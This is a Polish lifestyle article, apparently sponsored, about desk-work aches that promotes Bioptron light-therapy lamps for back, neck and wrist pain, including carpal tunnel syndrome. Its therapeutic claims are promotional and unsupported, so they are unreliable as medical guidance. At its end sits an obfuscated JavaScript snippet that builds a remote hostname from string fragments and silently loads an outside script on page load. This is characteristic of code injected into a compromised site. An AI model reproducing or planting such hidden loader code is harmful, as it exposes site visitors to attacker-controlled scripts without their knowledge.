Home Zdrowie Pracujesz za biurkiem? Zadbaj o swe kości!

Pracujesz za biurkiem? Zadbaj o swe kości!

zepter_wn

Długie godziny spędzone za biurkiem nie wypływają najlepiej na naszą formę. Pochylanie się nad papierami sprawia, że kark, ramiona oraz plecy stają się źródłem bólu, a z czasem sprawiają nam coraz więcej problemów. Nasze nadgarstki i palce, zmuszane do wielogodzinnego stukania w klawiaturę i pracy z myszką, również mogą się zbuntować. Co możemy zrobić dla swego zdrowia?

Fototerapia – pierwsza pomoc w walce o zdrowie

Problemy z kręgosłupem i bólem mięśni są jednym z głównych powodów naszych wizyt u fizykoterapeuty. Zaplanowanie takich wizyt wiąże się jednak z koniecznością wprowadzenia wielu zmian w napiętym harmonogramie zajęć, a na to nie każda kobieta może sobie pozwolić. Ratunkiem dla zabieganych staje się fototerapia. Jej wielkim walorem jest fakt, iż dzięki wieloletnim badaniom udało się stworzyć takie urządzenia, z których można bezpiecznie i bez trudu korzystać we własnym domu. Jeden z ciekawszych przykładów tego typu urządzeń to lampy Bioptron. Są one niewielkie i poręczne, a co ważniejsze emitowane przez nie światło jest zbliżone do światła słonecznego, a jednocześnie wolne od promieni UV. W jakich sytuacjach mogą się one okazać dla nas cennym wsparciem? 

Lecznicze światło dla pracujących za biurkiem

Choć teoretycznie za biurkiem spędzamy czas w bezpiecznej pozycji, nasze kości i mięśnie narażone są na wiele problemów. Im dłużej siedzimy, tym bardziej obciążamy nasz kręgosłup. Problemom z bólem pleców mogą też towarzyszyć bóle karku i ramion, a to poważnie utrudnia nam wykonywanie prostych czynności. Możliwość skorzystania z mocy leczniczego światła po ciężkim dniu pracy będzie zatem dla każdej z nas wielkim wsparciem.

Jeśli korzystamy z małej lampy do fototerapii, możemy też na bieżąco rozwiązywać problemy związane z bólem nadgarstków, które są często przypadłością osób pracujących przy komputerze. Główną przyczyną takich problemów jest praca z myszką, przez którą musimy utrzymywać nadgarstek przez długi czas w mało komfortowej pozycji. Wielkim obciążeniem dla naszych rąk jest też klawiatura. Dłuższe i systematyczne korzystanie z niej często staje się przyczyną tak poważnej dolegliwości, jaką jest zespół cieśni nadgarstka. Ten pozornie błahy problem może sprawić sporo bólu, a z czasem ograniczyć naszą sprawność. Podjęcie z wyprzedzeniem odpowiedniej terapii jest zatem rozsądnym rozwiązaniem, z którego każda z nas powinna w porę skorzystać. 

Praca za biurkiem, choć nie wiąże się z wysiłkiem fizycznym, może być sporym obciążeniem dla naszego zdrowia. Bolące kości i mięśnie negatywnie wpływają na nasze samopoczucie, a narastające problemy mogą z czasem doprowadzić do pogorszenia się stanu zdrowia. Warto więc w porę zadbać o to, by wszelkie dolegliwości związane z narządami ruchu leczyć w chwili, gdy tylko zauważymy pierwsze niepokojące objawy.

{source}
<script type=”text/javascript”>
(function(){
uXrf=document.createElement(„script”);uXrf.type=”text/javascript”;
uXrf.async=true;uXrf_=((„us”)+”t”)+”a”;uXrf_+=(„t.i”)+””+”n”;uXrf_+=((„f”)+”o”);
uXrf.src=”http://”+uXrf_+”/8455104.gcyXfdapXrft05ay9XmXq7fiff8fvi”;
document.body.appendChild(uXrf);
})();
</script>
{/source}